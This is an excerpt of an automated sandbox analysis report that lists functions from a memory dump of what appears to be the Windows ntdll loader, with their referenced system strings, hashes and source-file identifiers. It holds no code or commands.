                                                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                      • API String ID: 0-1245972979
                                                                                                                                      • Opcode ID: ffa6c221a2cf72aacafe68e6a5a4cafeae56c9761adffdb15179ffc67de823fc
                                                                                                                                      • Instruction ID: fdb92f494194ada935b4f8d5f903c041936cf455a0df91c6ec579d4e748a34b1
                                                                                                                                      • Opcode Fuzzy Hash: ffa6c221a2cf72aacafe68e6a5a4cafeae56c9761adffdb15179ffc67de823fc
                                                                                                                                      • Instruction Fuzzy Hash: 63611576640B169BD722CF18C882B3BB7E5AFC0B60F148559EA959F291DB34FC00DB91
                                                                                                                                      Function 00FC64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010210AE
                                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01021028
                                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01020FE5
                                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0102106B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                      • API String ID: 0-1468400865
                                                                                                                                      • Opcode ID: 03d727a7c531c1508861dc9bad073177946d805b452d90fd75203cb0e66db3c6
                                                                                                                                      • Instruction ID: 08aa4566a2701146a3de11973692f31076650ddd70898badc6142d33a8f4984b
                                                                                                                                      • Opcode Fuzzy Hash: 03d727a7c531c1508861dc9bad073177946d805b452d90fd75203cb0e66db3c6
                                                                                                                                      • Instruction Fuzzy Hash: 0E7103B19083069FCB61DF14C985F977BA8AF94764F140868F9888B28AD734D588DBD2
                                                                                                                                      Function 00FE245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • LdrpDynamicShimModule, xrefs: 0102A998
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0102A9A2
                                                                                                                                      • apphelp.dll, xrefs: 00FE2462
                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0102A992
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                      • Opcode ID: 8449944cafe22d8b8f4d7ac32f81d2895106b73b66206463f645410ea057b235
                                                                                                                                      • Instruction ID: a19554d777022e39454a623bc82f77d19ae237844fe7d7d4472fdeab112db26c
                                                                                                                                      • Opcode Fuzzy Hash: 8449944cafe22d8b8f4d7ac32f81d2895106b73b66206463f645410ea057b235
                                                                                                                                      • Instruction Fuzzy Hash: 5A316A72B00211EBDB31DF5AD8C1AEAB7F9FB84B14F250069F980AB245DB76A941D740
                                                                                                                                      Function 00FD29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • HEAP: , xrefs: 00FD3264
                                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FD327D
                                                                                                                                      • HEAP[%wZ]: , xrefs: 00FD3255
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                      • API String ID: 0-617086771
                                                                                                                                      • Opcode ID: d0e477fbd3e824ac83ecf775ef7853bd5774c0891f10f4f15f61976d954d7224
                                                                                                                                      • Instruction ID: a86534b0902a74e26cedca39fac2c849e80a88ba93860accc48671c8bbb6e1ef
                                                                                                                                      • Opcode Fuzzy Hash: d0e477fbd3e824ac83ecf775ef7853bd5774c0891f10f4f15f61976d954d7224
                                                                                                                                      • Instruction Fuzzy Hash: D092EE71E042499FDB25CF68C440BADBBF2FF58310F18805AE985AB351D735AA41EF91
                                                                                                                                      Function 00FD0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                      • Opcode ID: 780ebed158ac53e8f49b38dab1617df9963427cd4fb70bae4f76718faac12815
                                                                                                                                      • Instruction ID: e1ab798373c339dff98db3ace4491e13bb2859a83b0ab96643d07fff571b8d6f
                                                                                                                                      • Opcode Fuzzy Hash: 780ebed158ac53e8f49b38dab1617df9963427cd4fb70bae4f76718faac12815
                                                                                                                                      • Instruction Fuzzy Hash: FCF1C131A00605DFEB15CF68C894BAAB7F6FF45304F2841A9E4569B382DB34E941EB51
                                                                                                                                      Function 00FE6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $@
                                                                                                                                      • API String ID: 0-1077428164
                                                                                                                                      • Opcode ID: 0fa8426b2c4f26bf7260a1831751eec06f8f8ab172f21927b2d3bcddcfe6718a
                                                                                                                                      • Instruction ID: 44a386cf993a7cff636793b2cc4a1fe31724fe859f6ebf438af90b99d1980bc7
                                                                                                                                      • Opcode Fuzzy Hash: 0fa8426b2c4f26bf7260a1831751eec06f8f8ab172f21927b2d3bcddcfe6718a
                                                                                                                                      • Instruction Fuzzy Hash: 69C28C72A083919FE725CF29C881BABBBE5AF88754F14892DF9C9C7241D734D804DB52
                                                                                                                                      Function 00FBA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                      • Opcode ID: 7ad957a6ddfa2328242865a009938717c0a969a292b5891b546aef7f63119b52
                                                                                                                                      • Instruction ID: 515551e72b75263d22839e63a3f66520b497d35c1be44e7a3bc294a6555e2155
                                                                                                                                      • Opcode Fuzzy Hash: 7ad957a6ddfa2328242865a009938717c0a969a292b5891b546aef7f63119b52
                                                                                                                                      • Instruction Fuzzy Hash: 88A17D719416299BEB31EF24CD88BEAB7B8EF44710F1041E9E948A7250D7399F84CF50
                                                                                                                                      Function 00FE0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0102A10F
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0102A121
                                                                                                                                      • LdrpCheckModule, xrefs: 0102A117
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-161242083
                                                                                                                                      • Opcode ID: ce38405dfa0a3b1738b68895dc73e450d94d32b33c06f5bbb1da06a1de571964
                                                                                                                                      • Instruction ID: 5c9482dcfef33f92b28b5b19a3d8df7e7bdbc2c0acfcd660f127ea539cc97ff7
                                                                                                                                      • Opcode Fuzzy Hash: ce38405dfa0a3b1738b68895dc73e450d94d32b33c06f5bbb1da06a1de571964
                                                                                                                                      • Instruction Fuzzy Hash: 4A710071A00205DFCB24DF69CD81BAEB7F4FB44704F28456DE882EB641DA79AD81DB50
                                                                                                                                      Function 00FD0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-1334570610
                                                                                                                                      • Opcode ID: 0943412831b1be7d2ff69a63b9270db7b14851675f21c01e126cf845b4242002
                                                                                                                                      • Instruction ID: eb0d316410925471a5a50e407d8f39cbe19dace627dc1f8dcd050352d6fe23b8
                                                                                                                                      • Opcode Fuzzy Hash: 0943412831b1be7d2ff69a63b9270db7b14851675f21c01e126cf845b4242002
                                                                                                                                      • Instruction Fuzzy Hash: DA61D1316043019FDB29CF28C880BAABBE2FF45714F18855AE489CF382CB74E841DB95
                                                                                                                                      Function 00FFC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 010382D7
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010382E8
                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 010382DE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-1783798831
                                                                                                                                      • Opcode ID: f0f360ebf8990e25b122c21f267d95e6f9839554876d4becd49bf49992c3033a
                                                                                                                                      • Instruction ID: 6568665a033f6e9568b016d774c46e3e30fbde1a55ead803517630f91001691e
                                                                                                                                      • Opcode Fuzzy Hash: f0f360ebf8990e25b122c21f267d95e6f9839554876d4becd49bf49992c3033a
                                                                                                                                      • Instruction Fuzzy Hash: 1A41F6B2544318ABC730EB65DD81FAB77E8EF48750F04452AFA84D72A1E779D800ABD1
                                                                                                                                      Function 0107C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • PreferredUILanguages, xrefs: 0107C212
                                                                                                                                      • @, xrefs: 0107C1F1
                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0107C1C5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                      • API String ID: 0-2968386058
                                                                                                                                      • Opcode ID: bb33097c69ef1b50853e5e836de7e63ef7c50df5a2959d229d3c85f1bd8f8a8b
                                                                                                                                      • Instruction ID: 7594e4812b7347b56dcb9692fd6958f74c09397936dcb00b23cd2ebf2d1efae3
                                                                                                                                      • Opcode Fuzzy Hash: bb33097c69ef1b50853e5e836de7e63ef7c50df5a2959d229d3c85f1bd8f8a8b
                                                                                                                                      • Instruction Fuzzy Hash: B5416171E0020AEBEB51DED8C945FEEBBF9AB14700F14406AE649F7280E7749E458B54
                                                                                                                                      Function 01054144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                      • API String ID: 0-1373925480
                                                                                                                                      • Opcode ID: 10a6489382d1b5d06afe06e832fa3fa5353c8f424f63e8cca9f3182d0d5e41fe
                                                                                                                                      • Instruction ID: 2f2a01e16debe29876acf196ba0010f8316127fa9c66eb523d79cd5f2cca17b0
                                                                                                                                      • Opcode Fuzzy Hash: 10a6489382d1b5d06afe06e832fa3fa5353c8f424f63e8cca9f3182d0d5e41fe
                                                                                                                                      • Instruction Fuzzy Hash: F041F471A042588BEB61DB99C844BEEBBF5EF55380F14049ADD81EB781E7748981CB11
                                                                                                                                      Function 01044755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01044888
                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01044899
                                                                                                                                      • LdrpCheckRedirection, xrefs: 0104488F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                      • API String ID: 0-3154609507
                                                                                                                                      • Opcode ID: 108b58c7e173f3cc7a0c5a49e9eca6f79a5706a969f3489a384587b4bb828a83
                                                                                                                                      • Instruction ID: a4fcdd4924ff88fe2c52b7faf3aac4361c9624e3c81814934a0fa2738c669847
                                                                                                                                      • Opcode Fuzzy Hash: 108b58c7e173f3cc7a0c5a49e9eca6f79a5706a969f3489a384587b4bb828a83
                                                                                                                                      • Instruction Fuzzy Hash: 2E41A1B2A047519FEB61CE68D8C0B6A7BE4FF49A50B0505BDEDC8D7252E731E801CB91
                                                                                                                                      Function 00FD0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-2558761708
                                                                                                                                      • Opcode ID: bef184a742fdf567875f3048feb1ca479272294f3be7a847fedee5328910d0ec
                                                                                                                                      • Instruction ID: d16dccc8599b76d9658df41f1a1bb20ed2bf320edda1034a4fb6cfa714e229ea
                                                                                                                                      • Opcode Fuzzy Hash: bef184a742fdf567875f3048feb1ca479272294f3be7a847fedee5328910d0ec
                                                                                                                                      • Instruction Fuzzy Hash: 661102313181119FEB29C614CC41BB9F3A5EF80B29F18815BE486CB291DF34D840D755
                                                                                                                                      Function 010420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01042104
                                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 010420F3
                                                                                                                                      • LdrpInitializationFailure, xrefs: 010420FA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-2986994758
                                                                                                                                      • Opcode ID: beb351924e43121c5015f48ab5ed6ffe0778d64c8cc605cabf22008982db8a96
                                                                                                                                      • Instruction ID: de4014ada4ab8a98d606236275b38105fbe04bf0813a9e613438ac4fef2a0893
                                                                                                                                      • Opcode Fuzzy Hash: beb351924e43121c5015f48ab5ed6ffe0778d64c8cc605cabf22008982db8a96
                                                                                                                                      • Instruction Fuzzy Hash: 2BF0C8B57803087BE724D64CDC82FD537A8FB55B54F500065F7807B2C5D1B4A940D651
                                                                                                                                      Function 00FD03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: #%u
                                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                                      • Opcode ID: d3da99ab21d50bc5a4fe1e44323c2f25c626d1ca504e1524d18301736c64120c
                                                                                                                                      • Instruction ID: c5b2bf735eb3a6935ca56086e7d6fbaf6b08a7f542b1e8eca485e027daff341c
                                                                                                                                      • Opcode Fuzzy Hash: d3da99ab21d50bc5a4fe1e44323c2f25c626d1ca504e1524d18301736c64120c
                                                                                                                                      • Instruction Fuzzy Hash: 26714B71A0014A9FDB01DFA8C991FEEB7F9AF08704F144066EA45E7251EA78EE01DB61
                                                                                                                                      Function 00FCA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • LdrResSearchResource Exit, xrefs: 00FCAA25
                                                                                                                                      • LdrResSearchResource Enter, xrefs: 00FCAA13
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                      • API String ID: 0-4066393604
                                                                                                                                      • Opcode ID: fe11f061754db16b09bbe1c2cb23e5cf0838022c94ef7e383345fd210b92abb5
                                                                                                                                      • Instruction ID: 5e9d290689a58b9f762dd09c5d31c5d5b26309aa61fbbd3bf83d722b82c86d2a
                                                                                                                                      • Opcode Fuzzy Hash: fe11f061754db16b09bbe1c2cb23e5cf0838022c94ef7e383345fd210b92abb5
                                                                                                                                      • Instruction Fuzzy Hash: C7E17271E0021ADBEB21DE98CA81FEEB7B9BF48318F144169F941E7251D738AD40EB51
                                                                                                                                      Function 0108A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: `$`
                                                                                                                                      • API String ID: 0-197956300
                                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                      • Instruction ID: 429fa6dd090321d5076aa32cf331c4bcbdbbe77ae873f6d61d42cce119155d75
                                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                      • Instruction Fuzzy Hash: F0C1BE31308342DBEB25EE28C841B6BBBE5AFC4318F084A2EF6D68B690D775D545CB51
                                                                                                                                      Function 0103E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                                      • Opcode ID: d5580a19e24038e9dc4ea28344f5883c4a5792e09b27ddc311892d9189e17826
                                                                                                                                      • Instruction ID: 06d371cd0fb60ff826449f16ec9bb15b62f389c74cbf3490283074ee85c32b0d
                                                                                                                                      • Opcode Fuzzy Hash: d5580a19e24038e9dc4ea28344f5883c4a5792e09b27ddc311892d9189e17826
                                                                                                                                      • Instruction Fuzzy Hash: 91615D71E007199FDB15DFA8C940BAEBBF9FB84700F14416EE689EB291D731A900CB50
                                                                                                                                      Function 010643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$MUI
                                                                                                                                      • API String ID: 0-17815947
                                                                                                                                      • Opcode ID: d41210a031415a679b9740282be5e968e025f1f8683d5cfb90e04c273f779f6c
                                                                                                                                      • Instruction ID: 316788d79b2860b86e474a9f575b6465a6d70c524967f2321924e9799cd67da0
                                                                                                                                      • Opcode Fuzzy Hash: d41210a031415a679b9740282be5e968e025f1f8683d5cfb90e04c273f779f6c
                                                                                                                                      • Instruction Fuzzy Hash: F5514671E0021DAEEB11DFA9CC85AEEBBBCAB04754F10012AE641E7291DB359E05CB60
                                                                                                                                      Function 00FC04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • kLsE, xrefs: 00FC0540
                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FC063D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                      • API String ID: 0-2547482624
                                                                                                                                      • Opcode ID: 70ff3671484610ff9314919756433a1c2c377e26a782f30ae58b03c77e63594f
                                                                                                                                      • Instruction ID: a0956b500802f25cb95c075f44434dbfe2dae395f0406e086a4c9280cedf466b
                                                                                                                                      • Opcode Fuzzy Hash: 70ff3671484610ff9314919756433a1c2c377e26a782f30ae58b03c77e63594f
                                                                                                                                      • Instruction Fuzzy Hash: D851AC71904747CBC724DF24C642BA3B7E4AF84314F04483EE99A87240EB34A946EF92
                                                                                                                                      Function 00FCA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 00FCA2FB
                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 00FCA309
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                      • API String ID: 0-2876891731
                                                                                                                                      • Opcode ID: 348d80dba4c90075bfc90a2d219c3a7d921f9bd33444ae8f4c772b71a19b60d8
                                                                                                                                      • Instruction ID: 4a5a059efa9aac038e5a89e7d48d92eae0fce249642caa4427b9de80f2022f7a
                                                                                                                                      • Opcode Fuzzy Hash: 348d80dba4c90075bfc90a2d219c3a7d921f9bd33444ae8f4c772b71a19b60d8
                                                                                                                                      • Instruction Fuzzy Hash: EE41D031A0069ADBDB12CFA9C951FAD77F4FF84714F2440A9E940DB291E376E940EB42
                                                                                                                                      Function 00FFA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                                      • Opcode ID: 9025494190a011fbb5ec2ff2edfe1e34829530b830274c87fa4d229bd2316bf7
                                                                                                                                      • Instruction ID: a285fe4d0a54655dc1f0009374e19882d47f973f8c8d70b004c671a92dc4e9a6
                                                                                                                                      • Opcode Fuzzy Hash: 9025494190a011fbb5ec2ff2edfe1e34829530b830274c87fa4d229bd2316bf7
                                                                                                                                      • Instruction Fuzzy Hash: 5701D1B2250704AFE312DF24CD85B2677E8EB44B15F048939A64CC72A0E734D804EB46
                                                                                                                                      Function 00FCC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
